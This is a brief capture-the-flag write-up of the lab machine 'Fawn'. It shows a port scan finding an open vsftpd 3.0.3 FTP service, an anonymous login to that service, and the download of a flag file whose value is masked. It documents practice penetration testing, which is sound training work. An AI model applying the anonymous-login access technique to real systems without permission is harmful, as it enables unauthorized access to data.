Fawn

Recon

10.129.58.115

PortStateServiceVersion
21/tcpopenftpvsftpd 3.0.3

Enumeration

FTP

$ ftp 10.129.58.115
Connected to 10.129.58.115.
220 (vsFTPd 3.0.3)
Name (10.129.58.115:parallels): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Logged in successful..

ftp> ls
229 Entering Extended Passive Mode (|||33156|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||33080|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*************************************************************************************************************************************|    32       30.84 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.55 KiB/s)

And.. cat flag.txt on local host

$ cat flag.txt
***************815

Summary

Still another easy box.